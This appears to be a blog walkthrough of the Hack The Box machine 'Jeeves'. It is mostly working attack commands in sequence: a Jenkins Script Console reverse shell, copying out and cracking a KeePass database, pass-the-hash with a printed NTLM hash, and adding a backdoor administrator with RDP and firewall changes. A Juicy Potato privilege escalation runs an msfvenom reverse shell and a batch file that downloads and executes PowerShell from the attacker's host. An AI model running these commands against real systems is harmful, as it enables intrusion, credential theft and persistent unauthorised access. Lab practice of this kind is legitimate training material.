Note: In an attempt to be OSCP friendly, NONE of my write ups will utilize Metasploit. Zero. Zip. Tell your friends.
We’ll start with our basic nmap scan: nmap -p – 10.10.10.63
And then we’ll do some version discovery on those ports discovered.
Let’s start by enumerating some directories: gobuster dir -u http://10.10.10.63 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
This scan takes a while to run, but once it does we can look at the results:
And nothing. So let’s try enumarating port 50000 as well: gobuster dir -u http://10.10.10.63:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
And there’s a /askjeeves directory, so let’s navigate to that webpage.
It looks like this version of Jenkins is running 2.87, as we can tell from the bottom right corner of the webpage. If we click around a little bit, we can see the Manage Jenkins button, and when we click on that we see an option to bring up the Script Console.
A little bit of Googling “jenkins reverse shell script” brings us to a GitHub page where someone has some example code. Perhaps we can execute this in Jenkins and get a shell back to our box?
Let’s update localhost with the IP of our Kali box, use a port we’d like, start a NetCat listener on our Kali box, and then run the script:
And we’ve got a shell!
We’re in the C:\Users\Administrator\.jenkins directory but we can’t move back a folder:
So let’s run whoami and see if we can navigate to that user’s directory:
The user flag is in the Desktop of user kohsuke and can be viewed by typing type user.txt when you’re in that directory.
Copying Files from Target to Attacking Machine
If you dig around to the Documents directory, you’ll see a file called CEK.kdbx
We’re going to setup our Kali box as a smb server so we can transfer the Keypass file to our Kali machine and attack it. To do this we’re going to use impacket-smbserver
To use it, you type impacket-smbserver <share name> <share path>, so in our instance we’ll do impacket-smbserver Folder pwd
Then, from our Windows target machine, we’ll use some command line magic to mount that location: net use s: \\10.10.14.30\Folder
Now, on your Kali box, from within your working directory, create a folder called pwd.
Now, go back to your shell on the target/Windows machine and copy the file over: copy CEH.kdbx s: and then the file should be on your Kali box.
John the Ripper
There’s a program out there that will extract a hash from KeyPass files that then can be used in John the Ripper to attack. It’s called keepass2john and we can use it like this: keepass2john CEH.kdbx > CEHtohack
Then we can use John the Ripper to attack the hash: john CEHtohack -w:/usr/share/wordlists/rockyou.txt (note, you might have to extract the rockyou file first from its default state).
And then to view the file, we’ll need to install KeePass on our Kali box, so from terminal type: sudo apt-get install keepassx
And then open it up from the Application menu/toolbar.
Go to Database, Open Database, and find the file you transferred over. Then enter the password you recovered from John the Ripper.
The password we’re interested in here is the Backup stuff one, so let’s copy that hash. Further inspection tells us it’s a Windows NTLM hash, which can be used in the Pass the Hash attack.
Passing the Hash
We can use the Windows NTLM hash to bring up an Administrative command prompt on the target machine with the following command: pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 –system //10.10.10.63 cmd.exe
When we navigate to where the root flag usually is, we’re greeted by a file called hm.txt.
Hack The Box requires that the root.txt file be stored on the Desktop, so the flag is there. We just have to figure out how to read it. Enter Alternate Data Streams.
Alternate Data Streams
More information regarding Alternate Data Streams can be found here: https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/
You can view potential ADS by using the /r option when looking at a Windows Directory: dir /r
The type command can’t view this data, but the more command can: so type more /? to look at the help contents for this binary in Windows.
Thus, to view the contents of the file we can type more < hm.txt:root.txt
This portion is largely borrowed from this post, with parts updated for clarification as needed: https://medium.com/@OneebMalik/hack-the-box-jeeves-write-up-f1427462dc19
Let’s backup to where you utilized pth-winexe to pass the hash and log into the box.
The shell connection I had earlier was pissing me off, and I couldn’t even utilize the backspace. But what if we could establish a remote desktop connection instead? Let’s try that.
We have an administrative hash, and we’ve logged in as an admin, let’s add a user to the machine. To do this, we use the command net user /add <username> <password>
Thus, net user /add bob bobspassword
Then, we can add bob to the Administrators group with this command: net localgroup administrators bob /add
Now we start Remote Desktop on the machine: reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0
Then we have to tell Windows Firewall to allow our Remote Desktop Connection through: netsh firewall set service remoteadmin enable and then netsh firewall set service remotedesktop enable
Now, from a new terminal window in Kali, type this command to remote into the Windows box: rdesktop 10.10.10.63
Log on with the account you just created. Then use File Explorer to go to the Desktop folder of the Administrator account:
To view the ADS contents, this time I launched PowerShell as an Administrator (Find it in Windows Start Menu, right click, Run as Administrator). Then navigate to that location via the prompt.
Microsoft have an interesting post regarding how to look at ADS data from Powershell: https://docs.microsoft.com/en-us/archive/blogs/askcore/alternate-data-streams-in-ntfs
First, we can check to see if it has any streams associated with it using the following command: get-item .\hm.txt -stream *
Now that we see it has data attached to it, we can read it with the following command: get-content .\hm.txt -stream root.txt
Method 2 – Potato Attack
From our shell, we can do whoami /priv to see what type of privileges we have.
We can see here we have the SeImpersonatePrivilege enabled, which means we should be able to leverage this to create a shell back to our Kali machine, taking advantage of the elevated token left on this machine. Let’s type systeminfo to see what version of Windows we’re working with.
We’ll start by creating a payload with msfvenom: msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.20 LPORT=4444 -f exe > shell.exe
And then we’ll download JuicyPotato.exe from their GitHub page: wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
Next, we’ll navigate to the Desktop of the user: C:\Users\kohsuke\Desktop
We’re going to want to transfer a couple of files to our Windows machine, so from our Kali box let’s spin up the Simple HTTP Server: python -m SimpleHTTPServer 80
I tried using certutil to copy the files over, but it’s missing from the Windows machine. So let’s try smbserver
- Next, from our Windows shell we need to connect to this SMB share we created and then copy our files over:
net use s: \10.10.14.20\smb
copy s:\shell.exe c:\users\kohsuke\Desktop\shell.exe
copy s:\JuicyPotato.exe c:\users\kohsuke\Desktop\JuicyPotato.exe
To use Juicy Potato, we need a CLSID. We can look at some of the Win 10 Pro ones here: https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_10_Pro
The first three are related to XBox Live so I’m going to skip them and try the first wuauserv one.
Annnnddddd….it didn’t work, at least not the same way from which I did Arctic. What I noticed was that my shell.exe was getting removed quite quickly from my target machine, probably by antivirus. So we’ll try a different way.
We’re going to use the Invoke-PowerShellTcp.ps1 script from Nishang to get our reverse shell. We’re going to create that malicious script, store it on our Kali box, and then have a .bat file run on our target machine that will pull the script over and execute it, all with the compromised token we get via Juicy Potato.
Start by copying Invoke-PowerShellTcp.ps1 to your working directory:
Next, open it up in Nano and add the following line to the very bottom of the script: Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.20 -Port 4444
Next, let’s create a .bat file called shell.bat, and open it up in Nano. Add the following to it: powershell -c iex(new-object net.webclient).downloadstring(‘http://10.10.14.20:80/shell.ps1’)
Then stick the shell.bat into your smb folder because you’re about to copy it to your Windows machine: copy s:\shell.bat c:\users\kohsuke\Desktop\shell.bat
Now, start up Python SimpleHTTPServer so we can grab the shell.ps1 file once our script executes: python -m SimpleHTTPServer 80
Setup your NetCat listener on port 4444. And then from your Windows machine, use Juicy Potato to execute your shell.bat: JuicyPotato.exe -l 4444 -p c:\Users\kohsuke\Desktop\shell.bat -t *
And then check your new NetCat window: